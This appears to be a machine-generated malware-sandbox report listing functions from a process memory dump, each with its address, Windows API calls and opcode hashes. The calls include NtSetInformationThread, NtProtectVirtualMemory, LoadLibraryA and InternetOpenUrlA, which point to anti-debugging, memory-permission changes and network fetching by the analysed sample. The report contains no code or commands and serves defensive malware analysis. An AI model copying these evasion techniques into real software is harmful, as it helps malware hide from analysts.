Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 4df4eeb8ed6f438bcd0c649cb1c2fb3d2e41c8e40e520075ff2e7765346f010c
Instruction ID: e2a46f13e924938000bb7e931d9a7af22673ddf3dcaf1c73c40be582b424dd7d
Opcode Fuzzy Hash: 4df4eeb8ed6f438bcd0c649cb1c2fb3d2e41c8e40e520075ff2e7765346f010c
Instruction Fuzzy Hash: 7DF0C8347081459FDF2A5E34C05A3F51F637EA67047D94A4AC85347039D6138589D752

Uniqueness

Uniqueness Score: -1.00%

Function 005664D8, Relevance: 1.5, APIs: 1, Instructions: 27nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7536693be9a967889e91395a361ee4bd48dc202e3f76bef884484bf2c7659d88
Instruction ID: 794ab4ff6b5acc7be807e03195fae7824ecc21c6899b50af826c98a6d45042de
Opcode Fuzzy Hash: 7536693be9a967889e91395a361ee4bd48dc202e3f76bef884484bf2c7659d88
Instruction Fuzzy Hash: 26F065746085868BDB2A9B38C52A2B42F667EA2704BDC4788C9934B579D6229485C301

Uniqueness

Uniqueness Score: -1.00%

Function 005664FA, Relevance: 1.5, APIs: 1, Instructions: 22nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: d1b0387f5b1c13842347f98529f02d029e976155f9174f120fb1e3f72884e5c2
Instruction ID: a8ea4ded0972d5c9903864253e3b30a471a40e06a6795fbb26194c3ddb6d79b6
Opcode Fuzzy Hash: d1b0387f5b1c13842347f98529f02d029e976155f9174f120fb1e3f72884e5c2
Instruction Fuzzy Hash: C3E0263490838087DB26EF30C0D62ED6EA33CE0A04FE4496DC4C383429C623D045C746

Uniqueness

Uniqueness Score: -1.00%

Function 00565CCB, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00565906,00000040,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00565CFA

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: effbcb10055bc642fc2bf50ab40000bbfacae18897324aac2a014b70f7fc03f0
Instruction ID: c84f3710d1710dc3da1377eb50a1ebcf2e04f8b30a2a48e068c5c71d9c4bcff7
Opcode Fuzzy Hash: effbcb10055bc642fc2bf50ab40000bbfacae18897324aac2a014b70f7fc03f0
Instruction Fuzzy Hash: 81E027954145407755038B3C4C1896777676ED5B18B41C35CE473312F9CB33C501C2F5

Uniqueness

Uniqueness Score: -1.00%

Function 00565CE1, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00565906,00000040,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00565CFA

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 005640AC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 005640D2

Strings

\, xrefs: 005640C2

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LongNamePath
String ID: \
API String ID: 82841172-2967466578
Opcode ID: bbbac88ff80599b3a53f3770bd0dbfda3b4a6dcad758c4ffd8d73a9bca7969b0
Instruction ID: d36d9dfda2f003b878e21c9a47c4ef9bb15fd5b8d577faee37b169d94ea76c53
Opcode Fuzzy Hash: bbbac88ff80599b3a53f3770bd0dbfda3b4a6dcad758c4ffd8d73a9bca7969b0
Instruction Fuzzy Hash: 56E07201808784A3E393A734080CBC6AEAA3FE1B00F50488CE0C36F0A3CBB3C041CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0056322B, Relevance: 3.1, APIs: 2, Instructions: 118networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0056381A,00000000,00000000,00000000,00000000), ref: 00563259
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: ac44bb75fe274c61f94d2d323627a7de3f30383624d6f81d770fd06a0385df8c
Instruction ID: a5db798641ffa28202962243100bf1bd30a4cec2271317f8a0d4eb5ce352e4e5
Opcode Fuzzy Hash: ac44bb75fe274c61f94d2d323627a7de3f30383624d6f81d770fd06a0385df8c
Instruction Fuzzy Hash: F741A274344387ABEF314F10CD99BFE3A65BF41740F108928ED0AAB181EB728A84E610

Uniqueness

Uniqueness Score: -1.00%

Function 00563214, Relevance: 3.1, APIs: 2, Instructions: 106networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0056381A,00000000,00000000,00000000,00000000), ref: 00563259
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: acf8e0141b8ddaa4c8e7f1fa4d8c82a77aa62e85d06a2d24b06f8ec85ef4c958
Instruction ID: c17a9a9d662add48118fd24551f33da9fe65dafb517aedc628e720a746817480
Opcode Fuzzy Hash: acf8e0141b8ddaa4c8e7f1fa4d8c82a77aa62e85d06a2d24b06f8ec85ef4c958
Instruction Fuzzy Hash: FD31E470344347ABEB314F24CD99BFE3AA5BF41740F108928ED4AEB591EB72DA44E614

Uniqueness

Uniqueness Score: -1.00%

Function 00563244, Relevance: 3.1, APIs: 2, Instructions: 93networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0056381A,00000000,00000000,00000000,00000000), ref: 00563259
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 73ab3eae31559a61b454fa0cf040b63b532e98b5d71c4f3da933079c017bf883
Instruction ID: b221f626305b2c68df3c9bdabb1f5440f78a330e17038affa0fd9c2ee56df9dc
Opcode Fuzzy Hash: 73ab3eae31559a61b454fa0cf040b63b532e98b5d71c4f3da933079c017bf883
Instruction Fuzzy Hash: 1C31A770744346ABEB314E20CD99BFE3AA5BF41740F108928ED4ADB591EB72CA44DA54

Uniqueness

Uniqueness Score: -1.00%

Function 00564B77, Relevance: 1.8, APIs: 1, Instructions: 301libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00564BAE

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 31486b4e3881792087c836be41a124859de879441b733e497dd51ff3a33a6c02
Instruction ID: 2d962e5f9ae80de988e861348bc378232a5213f777212a4e0071d58d1c437d56
Opcode Fuzzy Hash: 31486b4e3881792087c836be41a124859de879441b733e497dd51ff3a33a6c02
Instruction Fuzzy Hash: 09A1057034070AAFEB215F24CD95BEA3E62FF95340F244928FE459B2D1C7B998C4AB45

Uniqueness

Uniqueness Score: -1.00%

Function 0056200D, Relevance: 1.6, APIs: 1, Instructions: 100threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00562073

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: a8a155a564209f7f618f3362166adaaba6ff950c00514068c36bfaf8857c5d59
Instruction ID: 1abe3db5164aede9a804caf928974e4a8a4f90bda6d704baae7e41d7e2ac924c
Opcode Fuzzy Hash: a8a155a564209f7f618f3362166adaaba6ff950c00514068c36bfaf8857c5d59
Instruction Fuzzy Hash: F4110A70604B02AFEB005F54C95DB953FA4BF463A4F718A91DD92DB1E2D2248882D611

Uniqueness

Uniqueness Score: -1.00%

Function 00563276, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 7d49ac39df4df20022c09ec312664daffa8fd4d8b70d7a89fbd1924bba36884c
Instruction ID: 1937693d0eed10ed4092d0647adf29f8422949530923195a81015e50db1fbe60
Opcode Fuzzy Hash: 7d49ac39df4df20022c09ec312664daffa8fd4d8b70d7a89fbd1924bba36884c
Instruction Fuzzy Hash: B521A470344347ABEB314F20CD95BFE3BA5BF41740F144928ED4A9B591EB739A44E614

Uniqueness

Uniqueness Score: -1.00%

Function 005646B2, Relevance: 1.6, APIs: 1, Instructions: 77libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 64dd266a2a7b686a128d49afd2a0341a1bc1003988fad58b8ec3e5ceda0fb02d
Instruction ID: ad2d3e7fba2410d735e0f12dbdc76793fd2dfb8ca570b0c551228bb9bd4df27c
Opcode Fuzzy Hash: 64dd266a2a7b686a128d49afd2a0341a1bc1003988fad58b8ec3e5ceda0fb02d
Instruction Fuzzy Hash: 52112C44048295EBD72616604AA43FA5D86FFD3351F714E3AFD4393042E796C549AD42

Uniqueness

Uniqueness Score: -1.00%

Function 005646C8, Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a4dd3d18d71ed3f9ab3f4f579a1973eb327441bc43836484259d7a5b66f2c6d4
Instruction ID: 1f4103a053d880cde233014437510e5a44da1309f8c5a53a2154d4247e5f69ab
Opcode Fuzzy Hash: a4dd3d18d71ed3f9ab3f4f579a1973eb327441bc43836484259d7a5b66f2c6d4
Instruction Fuzzy Hash: 0C114C441082D5E7D71517604AA43FA6D86FFD3310F718E39FD4393042D75AC58ABD42

Uniqueness

Uniqueness Score: -1.00%

Function 0056205A, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00562073

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: b83f987b4bc8d871e879331d6529071411d04c6245ff4df39cec4cfb11dd62d2
Instruction ID: 11020bd4cd99bb76be56a80e40fe3fd0adc74ad0a8440683bfcd87194f3eebcf
Opcode Fuzzy Hash: b83f987b4bc8d871e879331d6529071411d04c6245ff4df39cec4cfb11dd62d2
Instruction Fuzzy Hash: 64213A70604B02BFE7016F64C959BD93FA4BF4A3A4F614A95DD92DB1E2C721C483C611

Uniqueness

Uniqueness Score: -1.00%

Function 00562048, Relevance: 1.6, APIs: 1, Instructions: 72threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00562073

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 3eb62701b2b8f760dd185fe7ed0dbd9c8623dd7d755f245db05d158344f7dae3
Instruction ID: b3fa43dc7e90e98f8c416a7200fe9fe29fc6385584c69e0a8a738e6dd7b06d9f
Opcode Fuzzy Hash: 3eb62701b2b8f760dd185fe7ed0dbd9c8623dd7d755f245db05d158344f7dae3
Instruction Fuzzy Hash: 6E113B70600B02EFEB105E54C99DBA93BA4BF493A4F718A51ED42DB1E2D374C883C621

Uniqueness

Uniqueness Score: -1.00%

Function 005646B0, Relevance: 1.6, APIs: 1, Instructions: 72libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 025d6abb291510b6bf5a970d0235192b90979e884b6b654ab3f5dc14e794ce8f
Instruction ID: 89a453bc3f053366546f4ac5c2193b4cbd1c5b239a3744a364a281321230fde2
Opcode Fuzzy Hash: 025d6abb291510b6bf5a970d0235192b90979e884b6b654ab3f5dc14e794ce8f
Instruction Fuzzy Hash: 4C1161441482D5EAE72516608FA43FE5D46FF93361F708F36FD4393042E79889897D42

Uniqueness

Uniqueness Score: -1.00%

Function 005646DE, Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4019558266799b9600045aa5efdcae198efa0ada91173540d8b405956c701843
Instruction ID: e27c7e7a38afb6f80b1329fd81a9470446c2e4c92d35da2758af89ca32556b40
Opcode Fuzzy Hash: 4019558266799b9600045aa5efdcae198efa0ada91173540d8b405956c701843
Instruction Fuzzy Hash: 60110C441482D5E6D7112B605AA43BE6D86FFD3360F714E39FD4393042D756C54A6D43

Uniqueness

Uniqueness Score: -1.00%

Function 005632B1, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 6d9b128ecc4fe287319ec3819996c3664a46e73f49658521815ae5e998df470e
Instruction ID: 9068e2370f58ec8a3f58e0ab607fa4e1c6b91f2183d5fcfb8aa4128a2e8f6a45
Opcode Fuzzy Hash: 6d9b128ecc4fe287319ec3819996c3664a46e73f49658521815ae5e998df470e
Instruction Fuzzy Hash: E021D230344387ABEB318E20CD94BFE3BA4BF01350F108A28AD46DB5D1EB72DA44E610

Uniqueness

Uniqueness Score: -1.00%

Function 0056331C, Relevance: 1.6, APIs: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 26f0ca9fee5709176d647a39d68bf5a032d8d727e55de788cdfa3edd13db6da2
Instruction ID: ffd1445d5967c732ef8b394f8e305311c1ce74a51fd7abd91247de5594c1c019
Opcode Fuzzy Hash: 26f0ca9fee5709176d647a39d68bf5a032d8d727e55de788cdfa3edd13db6da2
Instruction Fuzzy Hash: EF21C3702483869FEB324F20CD94BFA3FA5BF41340F144969ED469B592EB729A44E724

Uniqueness

Uniqueness Score: -1.00%

Function 00564714, Relevance: 1.6, APIs: 1, Instructions: 61libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 52983c01bb3c70ba8ecfb32802746e753e9ea18f4c8b71080e5a4ef818a7df59
Instruction ID: e898170995994decbeb4294a50506cb6beac4563265eba2110f74a83c84c0af0
Opcode Fuzzy Hash: 52983c01bb3c70ba8ecfb32802746e753e9ea18f4c8b71080e5a4ef818a7df59
Instruction Fuzzy Hash: 1E01F5441082C4E6D7162B7059A43BEAD42BFE3310F314E3AFC43A7152DB6AC58AAD43

Uniqueness

Uniqueness Score: -1.00%

Function 005632DB, Relevance: 1.6, APIs: 1, Instructions: 59networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: cb4298b4e4ee145ad481bec66373a608f9153a0c721f4c314576d7b579e6f320
Instruction ID: 6033364410be662fab446aab6616dc716a410299aa03e24497727a57f82a256f
Opcode Fuzzy Hash: cb4298b4e4ee145ad481bec66373a608f9153a0c721f4c314576d7b579e6f320
Instruction Fuzzy Hash: 71114270344347ABEB358F20CD94BFE3BA5BF40740F104928AD4A9B691EB739A45E654

Uniqueness

Uniqueness Score: -1.00%

Function 0056473E, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 22818ff99432bef970b010ee3af3487db8c8f24bf5981131bbf6854556531b06
Instruction ID: 0e814c36c4ca14f2710b9826012eb3cf4a829b305c1fc8ba88be9a3d902290e9
Opcode Fuzzy Hash: 22818ff99432bef970b010ee3af3487db8c8f24bf5981131bbf6854556531b06
Instruction Fuzzy Hash: BD01F7441082D5E7D6122B6159A43BEAD42BFD3710F704E3AEC8393152D756C589AD43

Uniqueness

Uniqueness Score: -1.00%

Function 00564794, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: aeb03eaf44b83877cac4e62e6f2ec79399e376c864ef41446c427cdcd69e4363
Instruction ID: 22502ec0ffd0eaa492743ede1e45e7834176a7d20718182f54f489fc8e3e39a5
Opcode Fuzzy Hash: aeb03eaf44b83877cac4e62e6f2ec79399e376c864ef41446c427cdcd69e4363
Instruction Fuzzy Hash: 5C012B441083D6E6D7222B7049587BEAD42BF93324F348B76FC53971D3DB65C5896D02

Uniqueness

Uniqueness Score: -1.00%

Function 00564760, Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2b31f081caee2c66cd16b4530a1282bfae3caaa39d83f1a37a86ffd6078e6d07
Instruction ID: 9aa9599849ad492a84f4c58f38e7bbbbbb9bd5ff03cf60c3e7b6f835488121f0
Opcode Fuzzy Hash: 2b31f081caee2c66cd16b4530a1282bfae3caaa39d83f1a37a86ffd6078e6d07
Instruction Fuzzy Hash: 6E012844108285E7D7162B7145A83BD6E42BFD6710F304A3AED4397152DB56C58AAE43

Uniqueness

Uniqueness Score: -1.00%

Function 0056406E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 005640D2

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 2806a4689fbf30abc8aefdcc1325628e39670717f5b641103e80cc8e5c9c2df3
Instruction ID: f027a569b6481c1aef359405ddc13a8f7091fc4a4599205fe2dbcbab99de7ace
Opcode Fuzzy Hash: 2806a4689fbf30abc8aefdcc1325628e39670717f5b641103e80cc8e5c9c2df3
Instruction Fuzzy Hash: 50012614408392A7D3569B38445C6A67F967F96720F104A8CDFD28F6A2C7638051CB81

Uniqueness

Uniqueness Score: -1.00%

Function 005647D4, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 43189f3837d364140b8c00b1cc64edaaeac09bab313196adb08e245c7955b464
Instruction ID: c241ae4ba0c4f3629373e93b9e0bc1d2d1a10c81168af3394992b1687b58158d
Opcode Fuzzy Hash: 43189f3837d364140b8c00b1cc64edaaeac09bab313196adb08e245c7955b464
Instruction Fuzzy Hash: 06F0F60404C3D5ABC7126F7045683BEAE42BF97720F344B75ED9357093D766C949AE42

Uniqueness

Uniqueness Score: -1.00%

Function 00564779, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7332b77950d2551b9706b4fd89c7fd37ebe885fab40a2737eb85c663d88bfab7
Instruction ID: 24b81fa4b340f06f011c09169299cf83dedcf431f2f030d29b0397cb08350fbe
Opcode Fuzzy Hash: 7332b77950d2551b9706b4fd89c7fd37ebe885fab40a2737eb85c663d88bfab7
Instruction Fuzzy Hash: E7F04C001483C5D6C3126FB045983ADBE51BF93330F304B39EC92570D3D755C5496E42

Uniqueness

Uniqueness Score: -1.00%

Function 00564B90, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00564BAE

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b094fe0c4f3eb2c80d8846162e0863f1bf2ce5b556e989f86b7d61b7921d37cb
Instruction ID: 7aa33a4c73684108c91c29f27fa055be467976c647aa913db54f138df974ab40
Opcode Fuzzy Hash: b094fe0c4f3eb2c80d8846162e0863f1bf2ce5b556e989f86b7d61b7921d37cb
Instruction Fuzzy Hash: 0FF0F002008646EBCF022B749808BD66FA67F97334F180788ECA24A0F1C763C952EA06

Uniqueness

Uniqueness Score: -1.00%

Function 005647B0, Relevance: 1.5, APIs: 1, Instructions: 37libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c52f6d34aa86b47814b54d5e5f1529e66991f29d6f3b4ceca40c9674368fd5c4
Instruction ID: 4aa36980f511add800b3ef5fa4525cb950fa8615bfdac7658dae70a2693fec2d
Opcode Fuzzy Hash: c52f6d34aa86b47814b54d5e5f1529e66991f29d6f3b4ceca40c9674368fd5c4
Instruction Fuzzy Hash: E8F0E2041083D4A3D3136F7445683ADAE837FDA710F714A79A992A7062DBA7C549AF42

Uniqueness

Uniqueness Score: -1.00%

Function 005640DC, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 005640D2

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: a85a7d4e961b0020fbee8e46fedebeee1043b697d5640f458a5cdba1137d8621
Instruction ID: 95b6ef9242a0667fcf16e4bca8984d125e28c37acbc89c2f386b905446757aed
Opcode Fuzzy Hash: a85a7d4e961b0020fbee8e46fedebeee1043b697d5640f458a5cdba1137d8621
Instruction Fuzzy Hash: 14F0272540C382B7D2029B344848B5AAFE53FD6720F14494CE6D38B062CB62C041C755

Uniqueness

Uniqueness Score: -1.00%

Function 005647F1, Relevance: 1.5, APIs: 1, Instructions: 26libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bc79c2d2884b16b377957dac0f9e8f70160b3081f14c8706a84b5f5636cb9d46
Instruction ID: c7a450b294914d2ebc8bdbcfbe25a3a23879f2ee3c3782ebd6306315864fa8ce
Opcode Fuzzy Hash: bc79c2d2884b16b377957dac0f9e8f70160b3081f14c8706a84b5f5636cb9d46
Instruction Fuzzy Hash: F0E0E5101493D597C7025F640599359BE623F46320F214A799CA25B0A2D365C4049B41

Uniqueness

Uniqueness Score: -1.00%

Function 0056480F, Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5fec8d800dad433ad9d5de4a69ee3ff3cdca8fb9c81faea5cb802ce2cb9858ad
Instruction ID: 0fb2f0c5aeeda2556f7133d00cdcad85c1798db87d5e55ee36afd430152c3b96
Opcode Fuzzy Hash: 5fec8d800dad433ad9d5de4a69ee3ff3cdca8fb9c81faea5cb802ce2cb9858ad
Instruction Fuzzy Hash: 56E0C20454829493C3136B74546C3EEAE923FD6B10F710A39EC5257022D3A3C508AB87

Uniqueness

Uniqueness Score: -1.00%

Function 00564098, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 005640D2

